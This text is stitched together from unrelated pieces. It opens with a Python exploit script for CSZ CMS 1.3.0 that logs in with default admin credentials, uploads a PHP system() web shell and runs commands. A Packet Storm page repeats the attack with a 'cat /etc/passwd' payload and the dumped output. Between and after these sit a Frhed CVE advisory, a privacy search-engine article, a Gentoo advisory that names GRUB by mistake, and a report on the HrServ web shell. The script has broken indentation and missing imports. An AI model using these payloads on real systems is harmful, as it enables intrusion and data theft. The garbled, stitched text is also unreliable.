from selenium.common.exceptions import NoSuchElementException, TimeoutException  
import requests  
from time import sleep  
import sys  
import random  
import time  
import platform  
import tarfile  
from io import BytesIO

email = "admin@admin.com"   
password = "password"

class colors:  
    OKBLUE = '\033[94m'  
    WARNING = '\033[93m'  
    FAIL = '\033[91m'  
    ENDC = '\033[0m'  
    BOLD = '\033[1m'  
    UNDERLINE = '\033[4m'  
    CBLACK = '\33[30m'  
    CRED = '\33[31m'  
    CGREEN = '\33[32m'  
    CYELLOW = '\33[33m'  
    CBLUE = '\33[34m'  
    CVIOLET = '\33[35m'  
    CBEIGE = '\33[36m'  
    CWHITE = '\33[37m'

color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,  
                colors.CRED, colors.CBEIGE]  
random.shuffle(color_random)

def entryy():  
    x = color_random[0] + """

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮  
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃  
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯  
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃  
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃  
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

                <<   CSZ CMS Version 1.3.0 RCE     >>  
                <<      CODED BY TMRSWRR           >>  
                <<     GITHUB==>capture0x          >>

\n"""  
    for c in x:  
        print(c, end='')  
        sys.stdout.flush()  
        sleep(0.0045)  
    oo = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in oo:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

    tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"  
    for c in tt:  
        print(colors.CWHITE + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)  
    xx = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in xx:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

def check_geckodriver():  
    current_directory = os.path.dirname(os.path.abspath(__file__))  
    geckodriver_path = os.path.join(current_directory, 'geckodriver')

    if not os.path.isfile(geckodriver_path):  
        red = "\033[91m"  
        reset = "\033[0m"  
        print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)  
        user_input = input("Would you like to download it now? (yes/no): ").lower()  
        if user_input == 'yes':  
            download_geckodriver(current_directory)  
        else:  
            print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)  
            sys.exit(1)

def download_geckodriver(directory):

    print("[*] Detecting OS and architecture...")  
    os_name = platform.system().lower()  
    arch, _ = platform.architecture()

    if os_name == "linux":  
        os_name = "linux"  
        arch = "64" if arch == "64bit" else "32"  
    elif os_name == "darwin":  
        os_name = "macos"  
        arch = "aarch64" if platform.processor() == "arm" else ""  
    elif os_name == "windows":  
        os_name = "win"  
        arch = "64" if arch == "64bit" else "32"  
    else:  
        print("[!] Unsupported operating system.")  
        sys.exit(1)

    geckodriver_version = "v0.33.0"  
    geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"  
    ext = "zip" if os_name == "win" else "tar.gz"  
    url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

    print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")  
    response = requests.get(url, stream=True)

    if response.status_code == 200:  
        print("[*] Extracting GeckoDriver...")  
        if ext == "tar.gz":  
            with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:  
                tar.extractall(path=directory)  
        else:     
            with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:  
                zip_ref.extractall(directory)  
        print("[+] GeckoDriver downloaded and extracted successfully.")  
    else:  
        print("[!] Failed to download GeckoDriver.")  
        sys.exit(1)

        def create_zip_file(php_filename, zip_filename, php_code):  
    try:  
        with open(php_filename, 'w') as file:  
            file.write(php_code)  
        with zipfile.ZipFile(zip_filename, 'w') as zipf:  
            zipf.write(php_filename)  
        print("[+] Zip file created successfully.")  
        os.remove(php_filename)  
        return zip_filename  
    except Exception as e:  
        print(f"[!] Error creating zip file: {e}")  
        sys.exit(1)

def main(base_url, command):

    if not base_url.endswith('/'):  
        base_url += '/'

            zip_filename = None   

    check_geckodriver()  
    try:  
        firefox_options = FirefoxOptions()  
        firefox_options.add_argument("--headless")

        script_directory = os.path.dirname(os.path.abspath(__file__))  
        geckodriver_path = os.path.join(script_directory, 'geckodriver')  
        service = FirefoxService(executable_path=geckodriver_path)  
        driver = webdriver.Firefox(service=service, options=firefox_options)  
        print("[*] Exploit initiated.")

        # Login  
        driver.get(base_url + "admin/login")  
        print("[*] Accessing login page...")  
        driver.find_element(By.NAME, "email").send_keys(f"{email}")  
        driver.find_element(By.NAME, "password").send_keys(f"{password}")  
        driver.find_element(By.ID, "login_submit").click()  
        print("[*] Credentials submitted...")

         try:  
            error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")  
            if error_message.is_displayed():  
                print("[!] Login failed: Invalid credentials.")  
                driver.quit()  
                sys.exit(1)  
        except NoSuchElementException:  
            print("[+] Login successful.")

        # File creation    
        print("[*] Preparing exploit files...")  
        php_code = f"<?php echo system('{command}'); ?>"  
        zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)

         driver.get(base_url + "admin/upgrade")  
        print("[*] Uploading exploit payload...")  
        file_input = driver.find_element(By.ID, "file_upload")  
        file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

    # Uploading  
        driver.find_element(By.ID, "submit").click()  
        WebDriverWait(driver, 10).until(EC.alert_is_present())  
        alert = driver.switch_to.alert  
        alert.accept()

        # Exploit result   
        exploit_url = base_url + "exploit.php"  
        response = requests.get(exploit_url)  
        print(f"[+] Exploit response:\n\n{response.text}")

    except Exception as e:  
        print(f"[!] Error: {e}")  
    finally:  
        driver.quit()  
        if zip_filename and os.path.exists(zip_filename):  
            os.remove(zip_filename)

if __name__ == "__main__":  
    entryy()  
    if len(sys.argv) < 3:  
        print("Usage: python script.py [BASE_URL] [COMMAND]")  
    else:  
        main(sys.argv[1], sys.argv[2])

CSZ CMS 1.3.0 Remote Command Execution

Buffer overflow vulnerability in Frhed hex editor, affecting version 1.6.0. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument through the Structured Exception Handler (SEH) registers.

Affected Resources

*   Frhed 1.6.0 version.

Description

INCIBE has coordinated the publication of one vulnerabilitiy that affects Frhed, a binary file editor for Windows, which has been discovered by Rafael Pedrero.

This vulnerabilitiy has been assigned the following code, CVSS v3.1 base score, CVSS vector string, and CWE vulnerability type:

*   CVE-2023-4590: CVSS v3.1: 7.3 | CVSS: AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H | CWE-119.

Solution

There is no reported solution at this time.

Detail

*   **CVE-2023-4590**: buffer overflow vulnerability in Frhed hex editor, affecting version 1.6.0. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument through the Structured Exception Handler (SEH) registers.

CVE-2023-4590: Buffer Overflow vulnerability in Frhed

What you look for online is up to you—just make sure no one else is taking a peek.

When it comes to looking something up on the web, most of us default to “googling” it—Google's search engine has become so dominant that it's now a verb, in the same way that Photoshop is. But using Google for your searches comes with a privacy trade-off.

Google's business is, of course, based on advertising, and every search you make feeds into the profile of you that it uses to target the ads you see around the web. While Google isn't telling marketing firms what searches you're running, it is using those queries to build up a picture of you that ads can be sold against. As such, Google can be a real snoop about collecting all your data and using it to personalize your ads and the search results you get.

There are ways to increase your privacy on Google’s platforms, like using privacy-focused browsers, using privacy-focused alternatives to Google Maps, auto-deleting your web history after a certain time period, or simply limiting the amount of data the company collects in the first place, by opting out of features like web-based email and location awareness. (And you should know that using your browser's incognito mode isn’t as sneaky as you think it is.) If you're serious about getting off the data collection grid, there’s a bevy of other privacy-focused search options at your disposal. So if you want to use a search engine that doesn't keep track of your queries, serve your data to advertisers, or change your search results based on what it thinks you’ll like, you’ve got some options.

DuckDuckGo

DuckDuckGo is simple, secure, and private.

DuckDuckGo via David Nield

The granddaddy of Google alternatives, DuckDuckGo has made private search its raison d'être for more than 15 years. The service is a little harder to recommend these days, after a kerfuffle in 2022 where the company was caught in an apparent partnership with Microsoft that allowed the tech behemoth’s tracking scripts to run unimpeded on the DuckDuckGo browser. After outcry from privacy advocates, DuckDuckGo walked back that stance a few months later, and it now says it does indeed block Microsoft’s trackers.

If you can move past that particular ugly duckling, the service is still far more private than Google. DuckDuckGo says it collates information in search results from over 400 sources. It doesn’t draw from Google, but it does pull from places like Bing and Wikipedia. What it doesn’t do is personalize search results based on data it collects from users. Like Google, DuckDuckGo displays ads, but they’re not tailored to what it thinks you’ll like based on your search history.

DuckDuckGo can be installed into just about any browser via a browser extension. It also has a full browser available on desktop for Mac and Windows. There are also mobile apps on both iOS and Android that work as browsers while incorporating DuckDuckGo’s search engine.

On the browser and app alike, the service automatically tracks and blocks all the data-scraping efforts from the websites you visit. Press the shield button in the browser bar to see what sites have tried to collect your data or track your travels across the web. Another feature blocks trackers and data requests in other apps on your phone. DuckDuckGo says it can’t block certain scripts and trackers on the websites that run them (like Facebook, for example), but tapping that little button quickly lets you know what’s being blocked and what’s not.

Brave Search

Brave isn't going to keep track of what you're looking for.

Brave via David Nield

The privacy-focused browser extension provider Brave has its own dedicated search engine. The company launched the service in 2021. Like the other services on this list, Brave says its Search product doesn’t track your searches or log your data. It's impressively comprehensive—as much for its security and privacy as for the results you get.

Simply put, no logs of your queries are kept by the search engine. While that might make for a slightly less convenient user experience—Google might automatically know you're more interested in the Miami Dolphins than actual dolphins, for instance—it does mean that you can search without worrying that you're going to see any related advertising.

"It's impossible for us to share, sell, or lose your data, because we don’t collect it in the first place," says Brave. While the service might eventually become ad-supported, those adverts won't know anything about you or what you've been looking for on the web, making it distinctly different from Google's offering.

Brave also has a service in beta called Goggles that lets users customize their own page rankings to make search results more relevant to each person. It can have some issues, such as being a bit complicated and also could lead to people creating their own little filter bubbles—inadvertently or otherwise.

You can download the Brave Browser for desktop, or get its mobile apps on Android and iOS. You can also access the Brave search engine from any web browser and any device. You don't have to use the Brave browser to use it.

Kagi

The prospect of paying for a search engine might seem odd if you’re used to unlimited Googling on a whim. But that’s exactly the service Kagi is offering.

If you’re willing to pay for yet another subscription, Kagi is a premium search experience worth trying. You can customize how search results are displayed and how links are organized and accessed. There’s also a robust array of search operators and keyboard shortcuts to use. Kagi’s privacy policy is similar to the other services on this list, in that it doesn’t track your online movements or collect your data. It also doesn’t show ads, which feels like such a relief in the era of endless pop ups and sponsored posts.

The pricing plan is simple. There is a free tier, which allots you 100 searches per month before cutting you off. From there you can pay $5 per month for 500 searches, or get unlimited searches $10 a month. All plans, even the free ones, require you to make an account.

Kagi is available as a browser extension for Firefox, Google Chrome, and Safari. Kagi’s Orion browser is available on the Mac, and it also has an iOS app.

Startpage

Want Google’s search results but without Google? Startpage may be the answer. The company serves up Google’s search results without you being tracked. “Startpage submits your query to Google anonymously, then returns Google results to you privately,” the company says on its website. It adds that Google “never sees you and does not know who made the request”.

Startpage, which was founded in the Netherlands in 2006, says that it doesn’t store people’s personal data or search history, and your IP address is removed by its servers. The company also says it blocks price trackers and prevents advertisers from showing you ads based on your online history. (It does show ads from Google’s search results). Its search results also let you click to open an anonymous view of them, which it claims works like a VPN.

The experience isn’t exactly the same as Google search, but the results are. For instance, if you search for something in the news—maybe Elon Musk, if you must—Google will show you a carousel of the latest news stories before its search results. Google also includes Musk’s latest tweets, videos of him, and photos. When you’re using Startpage, the clutter is removed and you just get URLs.

Mojeek

Mojeek doesn’t use search results from other search engines. Instead, the British search engine, which launched in 2006, is building its own index of the web. It’s doing this in the same way as Google and Bing. The company’s crawlers, which trawl the web and collect information about pages, have indexed more than six billion web pages.

This crawling isn’t as extensive as Google’s—back in 2013 Google said it was indexing 30 trillion web pages, 100 billion times a month—but Mojeek says its approach means it is fully in control of the search results it shows. The company argues there should be alternative indexes to those controlled by Big Tech. “Making and altering our own algorithm from scratch to display high quality and unbiased results is essential,” the company said in 2018.

But that’s not the only difference to Google. Mojeek also says it doesn’t track people. The search results you see are based entirely on the words that you type in, the company says, and it doesn’t collect IP addresses, search history or the clicks that you make.

Limiting Google

You can break the connection between Google Chrome and your Google account.

Google via David Nield

It's worth bearing in mind that if you're using Google Chrome and you're signed into Google, you may well be syncing your DuckDuckGo or Brave searches back to your Google account. Your Google web history and your Chrome browsing history (if you're signed into Google) will match up most of the time, because Google keeps them in sync by default, partly to make it easier to use Google across multiple devices.

To stop this from happening in Chrome, click the three dots in the top right-hand corner, then choose **Settings**. If you see that you're signed into your Google account at the very top, click **Turn off**—this will break the connection between Google and your browser, and you'll be given the option to delete all the data that's stored locally on your device (including your browsing history, bookmarks, and stored passwords).

Perhaps an easier option is to simply switch to another browser altogether—as we've already mentioned, Brave, DuckDuckGo, and Kagi all have them. Other good cross-platform alternatives to Chrome are Microsoft Edge, Mozilla Firefox, Opera and Safari from Apple—but whichever one you switch to, be sure to check out the settings for deleting your browsing history as you go. (All of these browsers have simple-to-use options for this.)

Whichever browser you decide to use, opening up a private or incognito window while you're searching will prevent those searches from being logged inside the browser—as soon as you close the window, the search is gone forever. Bear in mind that these modes don't necessarily stop online companies from tracking your queries though. (If you sign into your Google account while in private mode, Google will still be able to track you.)

If you can't bring yourself to be parted from the search results that Google serves up, you can at least make sure that they're not remembered for too long. Open up your Google account settings page on the web, then click **Data & Privacy** and scroll down to **Web & App Activity.** You can choose either **Manage activity** to remove history and searches manually, or select the **Auto-delete** option to have this data wiped automatically once it's been stored for a certain amount of time.

Private and Secure Web Search Engines: DuckDuckGo, Brave, Kagi, Startpage

Gentoo Linux Security Advisory 202311-10 - Multiple vulnerabilities have been discovered in RenderDoc, the worst of which leads to remote code execution. Versions greater than or equal to 1.27 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: RenderDoc: Multiple Vulnerabilities  
     Date: November 25, 2023  
     Bugs: #908031  
       ID: 202311-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in RenderDoc, the worst of  
which leads to remote code execution.

Background  
=========  
RenderDoc is a free MIT licensed stand-alone graphics debugger that  
allows quick and easy single-frame capture and detailed introspection of  
any application using Vulkan, D3D11, OpenGL & OpenGL ES or D3D12 across  
Windows, Linux, Android, or Nintendo Switch™.

Affected packages  
================  
Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
media-gfx/renderdoc  < 1.27        >= 1.27

Description  
==========  
Multiple vulnerabilities have been discovered in GRUB. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All RenderDoc users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/renderdoc-1.27"

References  
=========  
[ 1 ] CVE-2023-33863  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33863  
[ 2 ] CVE-2023-33864  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33864  
[ 3 ] CVE-2023-33865  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33865

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-10

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-10

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

**CSZ CMS 1.3.0 Shell Upload**

Posted Nov 25, 2023

Authored by tmrswrr

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | b8f0f3c59686781c297f072ed9c3ca2896c1c6ea8f3916447a7e73c9086eb19a

Download | Favorite | View

**CSZ CMS 1.3.0 Shell Upload**

    # Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution# Date: 23/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.cszcms.com/# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download# Version: Version 1.3.0# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSqwoqwrdkog/admin/upgrade2 ) System Upgrade Manually  and upload this test.zip file :<?php echo system('cat /etc/passwd'); ?>3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.phproot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

**File Tags**

*   ActiveX (932)
*   Advisory (83,267)
*   Arbitrary (16,401)
*   BBS (2,859)
*   Bypass (1,803)
*   CGI (1,029)
*   Code Execution (7,417)
*   Conference (682)
*   Cracker (843)
*   CSRF (3,353)
*   DoS (23,990)
*   Encryption (2,372)
*   Exploit (52,241)
*   File Inclusion (4,233)
*   File Upload (977)
*   Firewall (822)
*   Info Disclosure (2,807)
*   Intrusion Detection (900)
*   Java (3,091)
*   JavaScript (879)
*   Kernel (6,834)
*   Local (14,569)
*   Magazine (586)
*   Overflow (12,849)
*   Perl (1,426)
*   PHP (5,162)
*   Proof of Concept (2,349)
*   Protocol (3,652)
*   Python (1,566)
*   Remote (31,026)
*   Root (3,605)
*   Rootkit (515)
*   Ruby (614)
*   Scanner (1,645)
*   Security Tool (7,926)
*   Shell (3,209)
*   Shellcode (1,216)
*   Sniffer (897)
*   Spoof (2,229)
*   SQL Injection (16,436)
*   TCP (2,419)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,079)
*   Web (9,786)
*   Whitepaper (3,757)
*   x86 (966)
*   XSS (18,042)
*   Other

**File Archives**

*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   Older

**Systems**

*   AIX (429)
*   Apple (2,037)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,907)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,375)
*   HPUX (880)
*   iOS (363)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (47,744)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (14,557)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,110)
*   UNIX (9,338)
*   UnixWare (187)
*   Windows (6,605)
*   Other

CSZ CMS 1.3.0 Shell Upload

An unspecified government entity in Afghanistan was targeted by a previously undocumented web shell called HrServ in what’s suspected to be an advanced persistent threat (APT) attack.
The web shell, a dynamic-link library (DLL) named “hrserv.dll,” exhibits “sophisticated features such as custom encoding methods for client communication and in-memory execution,” Kaspersky security researcher Mert

Cyber Attack / Threat Intelligence

An unspecified government entity in Afghanistan was targeted by a previously undocumented web shell called **HrServ** in what's suspected to be an advanced persistent threat (APT) attack.

The web shell, a dynamic-link library (DLL) named "hrserv.dll," exhibits "sophisticated features such as custom encoding methods for client communication and in-memory execution," Kaspersky security researcher Mert Degirmenci said in an analysis published this week.

The Russian cybersecurity firm said it identified variants of the malware dating all the way back to early 2021 based on the compilation timestamps of these artifacts.

Web shells are typically malicious tools that provide remote control over a compromised server. Once uploaded, it allows threat actors to carry out a range of post-exploitation activities, including data theft, server monitoring, and lateral advancement within the network.

The attack chain involves the PAExec remote administration tool, an alternative to PsExec that's used as a launchpad to create a scheduled task that masquerades as a Microsoft update ("MicrosoftsUpdate"), which subsequently is configured to execute a Windows batch script ("JKNLA.bat").

The Batch script accepts as an argument the absolute path to a DLL file ("hrserv.dll") that's then executed as a service to initiate an HTTP server that's capable of parsing incoming HTTP requests for follow-on actions.

"Based on the type and information within an HTTP request, specific functions are activated," Degirmenci said, adding "the GET parameters used in the hrserv.dll file, which is used to mimic Google services, include 'hl.'"

This is likely an attempt by the threat actor to blend these rogue requests in network traffic and make it a lot more challenging to distinguish malicious activity from benign events.

Embedded within those HTTP GET and POST requests is a parameter called cp, whose value – ranging from 0 to 7 – determines the next course of action. This includes spawning new threads, creating files with arbitrary data written to them, reading files, and accessing Outlook Web App HTML data.

If the value of cp in the POST request equals "6," it triggers code execution by parsing the encoded data and copying it into the memory, following which a new thread is created and the process enters a sleep state.

The web shell is also capable of activating the execution of a stealthy "multifunctional implant" in memory that's responsible for erasing the forensic trail by deleting the "MicrosoftsUpdate" job as well as the initial DLL and batch files.

The threat actor behind the web shell is currently not known, but the presence of several typos in the source code indicates that the malware author is not a native English speaker.

"Notably, the web shell and memory implant use different strings for specific conditions," Degirmenci concluded. "In addition, the memory implant features a meticulously crafted help message."

"Considering these factors, the malware's characteristics are more consistent with financially motivated malicious activity. However, its operational methodology exhibits similarities with APT behavior."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows